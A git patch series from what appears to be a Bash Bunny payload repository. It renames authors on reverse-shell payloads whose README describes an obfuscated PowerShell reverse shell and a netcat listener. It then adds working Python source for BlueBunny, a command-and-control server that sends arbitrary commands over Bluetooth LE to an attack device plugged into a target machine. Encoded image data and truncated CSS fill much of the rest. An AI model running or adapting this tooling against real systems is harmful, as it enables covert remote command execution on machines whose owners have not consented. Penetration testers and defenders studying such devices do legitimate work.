100644 --- a/payloads/library/remote_access/PingZhellBunny/README.md +++ b/payloads/library/remote_access/PingZhellBunny/README.md @@ -1,6 +1,6 @@ **Title: PingZhellBunny** -

Author: 0iphor13
+

Author: 0i41E
OS: Windows
Version: 1.5
diff --git a/payloads/library/remote_access/PingZhellBunny/payload.txt b/payloads/library/remote_access/PingZhellBunny/payload.txt index 2690061a..89617aac 100644 --- a/payloads/library/remote_access/PingZhellBunny/payload.txt +++ b/payloads/library/remote_access/PingZhellBunny/payload.txt @@ -2,7 +2,7 @@ # # Title: PingZhellBunny # Description: Getting remote access via ICMP -# Author: 0iphor13 +# Author: 0i41E # Version: 1.5 # Category: Remote_Access # Attackmodes: HID, RNDIS_ETHERNET diff --git a/payloads/library/remote_access/ReverseBunny/README.md b/payloads/library/remote_access/ReverseBunny/README.md index d3b39a26..fd2a6b3d 100644 --- a/payloads/library/remote_access/ReverseBunny/README.md +++ b/payloads/library/remote_access/ReverseBunny/README.md @@ -1,6 +1,6 @@ **Title: ReverseBunny** -

Author: 0iphor13
+

Author: 0i41E
OS: Windows
Version: 1.5
@@ -8,7 +8,7 @@ Version: 1.5

!Getting remote access via obfuscated reverse shell!
Upload payload.txt and RevBunny.ps1 onto your Bunny -![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunny/RevBunny.png) +![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunny/RevBunny.png) Change the variables in payload.txt to your attacking machine & start your listener. (for example netcat: nc -lvnp [PORT] )

diff --git a/payloads/library/remote_access/ReverseBunny/payload.txt b/payloads/library/remote_access/ReverseBunny/payload.txt index 75d003cc..fa5cd1ce 100644 --- a/payloads/library/remote_access/ReverseBunny/payload.txt +++ b/payloads/library/remote_access/ReverseBunny/payload.txt @@ -2,7 +2,7 @@ # # Title: ReverseBunny # Description: Get remote access, using an obfuscated powershell reverse shell. -# Author: 0iphor13 +# Author: 0i41E # Version: 1.5 # Category: Remote_Access # Attackmodes: HID, RNDIS_ETHERNET diff --git a/payloads/library/remote_access/ReverseBunnySSL/README.md b/payloads/library/remote_access/ReverseBunnySSL/README.md index 63182453..6d07da86 100644 --- a/payloads/library/remote_access/ReverseBunnySSL/README.md +++ b/payloads/library/remote_access/ReverseBunnySSL/README.md @@ -1,6 +1,6 @@ **Title: ReverseBunnySSL** -

Author: 0iphor13
+

Author: 0i41E
OS: Windows
Version: 1.2
For input and inspiration - Thanks to: Cribbit, sebkinne

@@ -26,5 +26,5 @@ I recommend openssl itself or ncat - Example syntax for both:
**Disclaimer: Because of obfuscation, it may take some time until the shell is fully executed by powershell** -![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/remote_access/ReverseCableSSL/CreateCert.png) -![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunnySSL/Startscreen.png) +![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/remote_access/ReverseCableSSL/CreateCert.png) +![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunnySSL/Startscreen.png) diff --git a/payloads/library/remote_access/ReverseBunnySSL/payload.txt b/payloads/library/remote_access/ReverseBunnySSL/payload.txt index 57358c05..c42c2091 100644 --- a/payloads/library/remote_access/ReverseBunnySSL/payload.txt +++ b/payloads/library/remote_access/ReverseBunnySSL/payload.txt @@ -2,7 +2,7 @@ # # Title: ReverseBunnySSL # Description: Get remote access, using an obfuscated powershell reverse shell. -# Author: 0iphor13 +# Author: 0i41E # Version: 1.2 # Category: Remote_Access # Attackmodes: HID, RNDIS_ETHERNET From 94b43bf16483663ccaa1515bf9c98ad198a2df4d Mon Sep 17 00:00:00 2001 From: 90N45 <79598596+90N45-d3v@users.noreply.github.com> Date: Sat, 8 Jun 2024 16:57:30 +0200 Subject: [PATCH 47/56] Add instructions to README.md --- .../library/remote_access/BlueBunny/README.md | 96 ++++++++++++++++--- 1 file changed, 84 insertions(+), 12 deletions(-) diff --git a/payloads/library/remote_access/BlueBunny/README.md b/payloads/library/remote_access/BlueBunny/README.md index 9df8124c..0f145c45 100644 --- a/payloads/library/remote_access/BlueBunny/README.md +++ b/payloads/library/remote_access/BlueBunny/README.md @@ -1,20 +1,92 @@ -# BlueBunny +![BlueBunny-Banner](https://github.com/90N45-d3v/BlueBunny/assets/79598596/fae0b5ca-6b38-41b3-a5fc-7aa3cabea369) +

+ + + +
+ +

+

+ C2 solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.
Send your Bash Bunny all the instructions it needs just over the air. +

+ * Author: 90N45 * Version: 1.0 * Category: Remote * Attackmodes: NONE (Custom) -### Description -Command & Control (C2) solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II. -Send your Bash Bunny all the instructions it needs on-demand over the air. +## Table of contents +- [Overview](https://github.com/90N45-d3v/BlueBunny#overview) +- [Installation & Start](https://github.com/90N45-d3v/BlueBunny#installation--start) +- [Manual communication with the Bash Bunny through Python](https://github.com/90N45-d3v/BlueBunny#manual-communication-with-the-bash-bunny-through-python) +- [Troubleshooting](https://github.com/90N45-d3v/BlueBunny#troubleshooting) +- [Working on...](https://github.com/90N45-d3v/BlueBunny#working-on) +- [Additional information](https://github.com/90N45-d3v/BlueBunny#additional-information) -### Setup -This payload makes your Bash Bunny usable for the BlueBunny C2 server. For installing the C2 server and controlling your Bash Bunny remotly from it you can follow the instructions form the [BlueBunny GitHub repository](https://github.com/90N45-d3v/BlueBunny) +## Overview +#### Structure +![BlueBunny-Structure](https://github.com/90N45-d3v/BlueBunny/assets/79598596/3004fb10-feef-45c8-8624-1393c2fb7288) -### Status -| LED | State | -| --- | --- | -| Magenta solid (SETUP) | Configuring BLE | -| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Bash Bunny can be connected to BlueBunny C2 | -*Average runtime: 13 seconds* \ No newline at end of file +## Installation & Start +1. Install required dependencies +```` +pip install pygatt "pygatt[GATTTOOL]" +```` +Make sure [BlueZ](http://www.bluez.org/download/) is installed and `gatttool` is usable +```` +sudo apt install bluez +```` +2. Download the `BlueBunny` folder and switch into the `BlueBunny/C2` folder +```` +cd BlueBunny/C2 +```` +3. Start the C2 server +```` +sudo python c2-server.py +```` +4. Plug your Bash Bunny with the BlueBunny payload into the target machine (payload at: `BlueBunny/payload.txt`). +5. Visit your C2 server from your browser on `localhost:1472` and connect your Bash Bunny (Your Bash Bunny will light up green when it's ready to pair). + + +## Manual communication with the Bash Bunny through Python +You can use BlueBunny's BLE backend and communicate with your Bash Bunny manually. +#### Example Code +````python +# Import the backend (BlueBunny/C2/BunnyLE.py) +import BunnyLE + +# Define the data to send +data = "QUACK STRING I love my Bash Bunny" +# Define the type of the data to send ("cmd" or "payload") (payload data will be temporary written to a file, to execute multiple commands like in a payload script file) +d_type = "cmd" + +# Initialize BunnyLE +BunnyLE.init() + +# Connect to your Bash Bunny +bb = BunnyLE.connect() + +# Send the data and let it execute +BunnyLE.send(bb, data, d_type) +```` + +## Troubleshooting +#### Connecting your Bash Bunny doesn't work? Try the following instructions: +- Try connecting a few more times +- Check if your bluetooth adapter is available +- Restart the system your C2 server is running on +- Check if your Bash Bunny is running the BlueBunny payload properly +- How far away from your Bash Bunny are you? Is the environment (distance, interferences etc.) still sustainable for typical BLE connections? +#### Bugs within BlueZ +The Bluetooth stack used is well known, but also very buggy. If starting the connection with your Bash Bunny does not work, it is probably a temporary problem due to BlueZ. Here are some kind of errors that can be caused by temporary bugs. These usually disappear at the latest after rebooting the C2's operating system, so don't be surprised and calm down if they show up. +- Timeout after 5.0 seconds +- Unknown error while scanning for BLE devices + +## Working on... +- Remote shell access +- BLE exfiltration channel +- Improved connecting process + +## Additional information +As I said, BlueZ, the base for the bluetooth part used in BlueBunny, is somewhat bug prone. If you encounter any non-temporary bugs when connecting to Bash Bunny as well as any other bugs/difficulties in the whole BlueBunny project, you are always welcome to contact me. Be it a problem, an idea/solution or just a nice feedback. From c9ecb7c42be50b98c57603dce212110a8331fc06 Mon Sep 17 00:00:00 2001 From: 90N45 <79598596+90N45-d3v@users.noreply.github.com> Date: Sat, 8 Jun 2024 17:02:39 +0200 Subject: [PATCH 48/56] Add BlueBunny C2 source code --- .../remote_access/BlueBunny/C2/BunnyLE.py | 46 +++ .../remote_access/BlueBunny/C2/c2-server.py | 61 ++++ .../BlueBunny/C2/static/bb_icon.png | Bin 0 -> 3777 bytes .../BlueBunny/C2/static/bb_icon_original.png | Bin 0 -> 1874 bytes .../BlueBunny/C2/static/bootstrap.min.css | 7 + .../BlueBunny/C2/static/logo.png | Bin 0 -> 44549 bytes .../BlueBunny/C2/templates/connecting.html | 163 +++++++++ .../BlueBunny/C2/templates/index.html | 337 ++++++++++++++++++ 8 files changed, 614 insertions(+) create mode 100644 payloads/library/remote_access/BlueBunny/C2/BunnyLE.py create mode 100644 payloads/library/remote_access/BlueBunny/C2/c2-server.py create mode 100644 payloads/library/remote_access/BlueBunny/C2/static/bb_icon.png create mode 100644 payloads/library/remote_access/BlueBunny/C2/static/bb_icon_original.png create mode 100644 payloads/library/remote_access/BlueBunny/C2/static/bootstrap.min.css create mode 100644 payloads/library/remote_access/BlueBunny/C2/static/logo.png create mode 100644 payloads/library/remote_access/BlueBunny/C2/templates/connecting.html create mode 100644 payloads/library/remote_access/BlueBunny/C2/templates/index.html diff --git a/payloads/library/remote_access/BlueBunny/C2/BunnyLE.py b/payloads/library/remote_access/BlueBunny/C2/BunnyLE.py new file mode 100644 index 00000000..b4c6aba7 --- /dev/null +++ b/payloads/library/remote_access/BlueBunny/C2/BunnyLE.py @@ -0,0 +1,46 @@ +import pygatt +import base64 + +adapter = pygatt.GATTToolBackend() +char_uuid = '0000fff2-0000-1000-8000-00805f9b34fb' + +def init(): + adapter.start() + return True + +def connect(): + device_name = 'BlueBunny' + + devices = adapter.scan(run_as_root=True) + device = next((d for d in devices if d['name'] == device_name), None) + + if device: + device_address = device['address'] + bunny = adapter.connect(device_address) + + return bunny + else: + return False + +def send(bunny, data: str, d_type: str): + if d_type == "cmd": + flag = "" + else: + flag = "" + data = flag + data + flag + data = base64.b64encode(data.encode("utf-8")).decode("utf-8") + + if not len(data) <= 15: + data_pieces = [] + + for i in range(0, len(data), 15): + data_pieces.append(data[i:i + 15]) + + for i, piece in enumerate(data_pieces): + if i == (len(data_pieces) - 1): + bunny.char_write(char_uuid, (piece + "\n").encode("utf-8")) + else: + bunny.char_write(char_uuid, piece.encode("utf-8")) + + else: + bunny.char_write(char_uuid, (data + "\n").encode("utf-8")) \ No newline at end of file diff --git a/payloads/library/remote_access/BlueBunny/C2/c2-server.py b/payloads/library/remote_access/BlueBunny/C2/c2-server.py new file mode 100644 index 00000000..afd852b7 --- /dev/null +++ b/payloads/library/remote_access/BlueBunny/C2/c2-server.py @@ -0,0 +1,61 @@ +from flask import Flask, request, render_template, jsonify +import urllib.parse +import threading +import BunnyLE + +app = Flask(__name__) + +bb = None +connection = 0 +con_fail_count = 0 + +def connect_bunny(): + global bb + global connection + global con_fail_count + + BunnyLE.init() + current_try = BunnyLE.connect() + + if not current_try == False: + bb = current_try + connection = 1 + else: + con_fail_count += 1 + connection = 2 + +@app.route("/", methods=['GET', 'POST']) +def index(): + if request.method == 'POST': + global bb + query = request.form.get('query') + mode = request.form.get('mode') + + BunnyLE.send(bb, query, mode) + + return render_template("index.html") + +@app.route("/connect", methods=['GET']) +def connect(): + connect_thread = threading.Thread(target=connect_bunny) + connect_thread.start() + + return render_template("connecting.html") + +@app.route("/con-check", methods=['GET']) +def connectCheck(): + global con_fail_count + + if connection == 0: + return jsonify(connected=0) + elif connection == 1: + return jsonify(connected=1) + elif connection == 2: + if con_fail_count < 5: + connect_bunny() + return jsonify(connected=0) + else: + return jsonify(connected=2) + +if __name__ == '__main__': + app.run(host="localhost", port=1472, debug=True) diff --git a/payloads/library/remote_access/BlueBunny/C2/static/bb_icon.png b/payloads/library/remote_access/BlueBunny/C2/static/bb_icon.png new file mode 100644 index 0000000000000000000000000000000000000000..bdbf80042c0e7d88585c6687c296aef24205e9de GIT binary patch literal 3777 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 literal 0 HcmV?d00001 diff --git a/payloads/library/remote_access/BlueBunny/C2/static/bb_icon_original.png b/payloads/library/remote_access/BlueBunny/C2/static/bb_icon_original.png new file mode 100644 index 0000000000000000000000000000000000000000..d31a49c34dc9ff4574b4edda294196f6b1de0846 GIT binary patch literal 1874 zcmYLJXH=8v68@4<0*gqE!641$A}APG+M<9Lgn+QX2BipM3Lqa6_-;rdWoZG0gc6EM zk+L8x+_+g}X(Ckt>CMFx5T)*wvNTbOSHMl+dhVPv@AJ$vGiS~_KL!8*v_CBzA~HaK zKwuQmU!MXJ1soPY@uLxin!wZpe1oWm6aXNQO#8~eqBI23Cq|N7{QVNK=h7)n}T5Q!DvAx04NFqKOqrz5E)o~A^pE7$b1!#gH*r6J^+v= z(!+udCJAR%f)EuFARC0pAp%qYLm@u_3eDwzE=6SMTgO=*XfhBO1_~Jhi9`zEFsG_4 zlm!1e%)x{iQ^6c-p-iU+n^7RY8wZb-85tx)W})GsG(SqHnV<#?0*TacGhz@FKopjr z03pf&5pcmi5HKbJfQ!Hq#6$&4cuDak(&PY1G1c+%Azc@PPm;dml;}3q9HfE>O4tox z+n8#zdQlz~LoKNuk8StNi*WcM3KX{S%1&5a~ z*o`Vo$1jf^R+_6nFMX0Ct|cULlpErS;&o?(G1n|bY*kLe(82~7PpaCrY)YaG8}ZS3<#R7FLZ;W zBUPJa>01Nh$pvpSalPqM^QhY2ZcR;Tog?n!t2%1#mZ|G}C_K|!VjfDy6|6p`-$m>_ ze^;%c8A)eZC>WhRuT2U`Fj=eqQnl_rcoS;=^9O>WGmeu<-9)@EL~HwyTp9vCrbGo2 z$Wyi?)NH={y#SeiUyx_q<(wsDi>s36{Iix=`P<_XAuDOSMW%yf_ zS+vf`ee|-jF2>ElW9;R%Cd+XY%bnh68<=gja~aamWFX9cayV?N)ad=`f_T?F3(O-W zi7<%|-)?=sUwzMRVUTyKe8~s8w$P{Kayy*bj>>g(*J(z`ifJuFJJ>{&M5K7&{MI)0{Sj=OPcf~W$RX}5z=tB1 zEta+3CuQK)nC6u|`-@Gw&eEFg8rv;PPR2E zo$BSTh6(O?Wt7%$_kY*g{6sSvT56(ub;6*HS3yHF`sK5c>)hixdMk5cE{%J^zVi8n zxzg=Erw29d;c-eM^7GcNY@>ZPD0e{uwwl(XU|<}9^H+JeVRk8GPc?>+K3rP=!1(^r zO6ACwoB$qEky~>`qUlnQ#U|@|`5S1=s-SDSZC&mNA_SlRB^TA8mw5TiRF%fByNd0b zPN?gw8S$)Cs{e{=RMdKtLtF2iMXrq!;i?H$E+J-JeZH-NG;Ymu{T5-Ds-!=EP4P4} z&+*FccsJFzfyy7BoZGwn$EN;gYt!68ksqn|JSpz34?3Tnzw|T9FKrE_n5E?K4+OBh zGqsa*)JE6)Q6E0C=ET*4W2pW5?}|6tW$hPwfkfSyWaq2B7mm!TXEKq`ehvyrlY#Eo z&GfKB-T0> literal 0 HcmV?d00001 diff --git a/payloads/library/remote_access/BlueBunny/C2/static/bootstrap.min.css b/payloads/library/remote_access/BlueBunny/C2/static/bootstrap.min.css new file mode 100644 index 00000000..f06f5239 --- /dev/null +++ b/payloads/library/remote_access/BlueBunny/C2/static/bootstrap.min.css @@ -0,0 +1,7 @@ +@charset "UTF-8";/*! + * Bootstrap v5.2.3 (https://getbootstrap.com/) + * Copyright 2011-2022 The Bootstrap Authors + * Copyright 2011-2022 Twitter, Inc. + * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) + */:root{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-black:#000;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-gray-100:#f8f9fa;--bs-gray-200:#e9ecef;--bs-gray-300:#dee2e6;--bs-gray-400:#ced4da;--bs-gray-500:#adb5bd;--bs-gray-600:#6c757d;--bs-gray-700:#495057;--bs-gray-800:#343a40;--bs-gray-900:#212529;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-primary-rgb:13,110,253;--bs-secondary-rgb:108,117,125;--bs-success-rgb:25,135,84;--bs-info-rgb:13,202,240;--bs-warning-rgb:255,193,7;--bs-danger-rgb:220,53,69;--bs-light-rgb:248,249,250;--bs-dark-rgb:33,37,41;--bs-white-rgb:255,255,255;--bs-black-rgb:0,0,0;--bs-body-color-rgb:33,37,41;--bs-body-bg-rgb:255,255,255;--bs-font-sans-serif:system-ui,-apple-system,"Segoe UI",Roboto,"Helvetica Neue","Noto Sans","Liberation Sans",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--bs-font-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;--bs-gradient:linear-gradient(180deg, rgba(255, 255, 255, 0.15), rgba(255, 255, 255, 0));--bs-body-font-family:var(--bs-font-sans-serif);--bs-body-font-size:1rem;--bs-body-font-weight:400;--bs-body-line-height:1.5;--bs-body-color:#212529;--bs-body-bg:#fff;--bs-border-width:1px;--bs-border-style:solid;--bs-border-color:#dee2e6;--bs-border-color-translucent:rgba(0, 0, 0, 0.175);--bs-border-radius:0.375rem;--bs-border-radius-sm:0.25rem;--bs-border-radius-lg:0.5rem;--bs-border-radius-xl:1rem;--bs-border-radius-2xl:2rem;--bs-border-radius-pill:50rem;--bs-link-color:#0d6efd;--bs-link-hover-color:#0a58ca;--bs-code-color:#d63384;--bs-highlight-bg:#fff3cd}*,::after,::before{box-sizing:border-box}@media (prefers-reduced-motion:no-preference){:root{scroll-behavior:smooth}}body{margin:0;font-family:var(--bs-body-font-family);font-size:var(--bs-body-font-size);font-weight:var(--bs-body-font-weight);line-height:var(--bs-body-line-height);color:var(--bs-body-color);text-align:var(--bs-body-text-align);background-color:var(--bs-body-bg);-webkit-text-size-adjust:100%;-webkit-tap-highlight-color:transparent}hr{margin:1rem 0;color:inherit;border:0;border-top:1px solid;opacity:.25}.h1,.h2,.h3,.h4,.h5,.h6,h1,h2,h3,h4,h5,h6{margin-top:0;margin-bottom:.5rem;font-weight:500;line-height:1.2}.h1,h1{font-size:calc(1.375rem + 1.5vw)}@media (min-width:1200px){.h1,h1{font-size:2.5rem}}.h2,h2{font-size:calc(1.325rem + .9vw)}@media (min-width:1200px){.h2,h2{font-size:2rem}}.h3,h3{font-size:calc(1.3rem + .6vw)}@media (min-width:1200px){.h3,h3{font-size:1.75rem}}.h4,h4{font-size:calc(1.275rem + .3vw)}@media (min-width:1200px){.h4,h4{font-size:1.5rem}}.h5,h5{font-size:1.25rem}.h6,h6{font-size:1rem}p{margin-top:0;margin-bottom:1rem}abbr[title]{-webkit-text-decoration:underline dotted;text-decoration:underline dotted;cursor:help;-webkit-text-decoration-skip-ink:none;text-decoration-skip-ink:none}address{margin-bottom:1rem;font-style:normal;line-height:inherit}ol,ul{padding-left:2rem}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 1rem}b,strong{font-weight:bolder}.small,small{font-size:.875em}.mark,mark{padding:.1875em;background-color:var(--bs-highlight-bg)}sub,sup{position:relative;font-size:.75em;line-height:0;vertical-align:baseline}sub{bottom:-.25em}sup{top:-.5em}a{color:var(--bs-link-color);text-decoration:underline}a:hover{color:var(--bs-link-hover-color)}a:not([href]):not([class]),a:not([href]):not([class]):hover{color:inherit;text-decoration:none}code,kbd,pre,samp{font-family:var(--bs-font-monospace);font-size:1em}pre{display:block;margin-top:0;margin-bottom:1rem;overflow:auto;font-size:.875em}pre code{font-size:inherit;color:inherit;word-break:normal}code{font-size:.875em;color:var(--bs-code-color);word-wrap:break-word}a>code{color:inherit}kbd{padding:.1875rem .375rem;font-size:.875em;color:var(--bs-body-bg);background-color:var(--bs-body-color);border-radius:.25rem}kbd kbd{padding:0;font-size:1em}figure{margin:0 0 1rem}img,svg{vertical-align:middle}table{caption-side:bottom;border-collapse:collapse}caption{padding-top:.5rem;padding-bottom:.5rem;color:#6c757d;text-align:left}th{text-align:inherit;text-align:-webkit-match-parent}tbody,td,tfoot,th,thead,tr{border-color:inherit;border-style:solid;border-width:0}label{display:inline-block}button{border-radius:0}button:focus:not(:focus-visible){outline:0}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}button,select{text-transform:none}[role=button]{cursor:pointer}select{word-wrap:normal}select:disabled{opacity:1}[list]:not([type=date]):not([type=datetime-local]):not([type=month]):not([type=week]):not([type=time])::-webkit-calendar-picker-indicator{display:none!important}[type=button],[type=reset],[type=submit],button{-webkit-appearance:button}[type=button]:not(:disabled),[type=reset]:not(:disabled),[type=submit]:not(:disabled),button:not(:disabled){cursor:pointer}::-moz-focus-inner{padding:0;border-style:none}textarea{resize:vertical}fieldset{min-width:0;padding:0;margin:0;border:0}legend{float:left;width:100%;padding:0;margin-bottom:.5rem;font-size:calc(1.275rem + .3vw);line-height:inherit}@media (min-width:1200px){legend{font-size:1.5rem}}legend+*{clear:left}::-webkit-datetime-edit-day-field,::-webkit-datetime-edit-fields-wrapper,::-webkit-datetime-edit-hour-field,::-webkit-datetime-edit-minute,::-webkit-datetime-edit-month-field,::-webkit-datetime-edit-text,::-webkit-datetime-edit-year-field{padding:0}::-webkit-inner-spin-button{height:auto}[type=search]{outline-offset:-2px;-webkit-appearance:textfield}::-webkit-search-decoration{-webkit-appearance:none}::-webkit-color-swatch-wrapper{padding:0}::-webkit-file-upload-button{font:inherit;-webkit-appearance:button}::file-selector-button{font:inherit;-webkit-appearance:button}output{display:inline-block}iframe{border:0}summary{display:list-item;cursor:pointer}progress{vertical-align:baseline}[hidden]{display:none!important}.lead{font-size:1.25rem;font-weight:300}.display-1{font-size:calc(1.625rem + 4.5vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-1{font-size:5rem}}.display-2{font-size:calc(1.575rem + 3.9vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-2{font-size:4.5rem}}.display-3{font-size:calc(1.525rem + 3.3vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-3{font-size:4rem}}.display-4{font-size:calc(1.475rem + 2.7vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-4{font-size:3.5rem}}.display-5{font-size:calc(1.425rem + 2.1vw);font-weight:300;line-height:1.2}@media 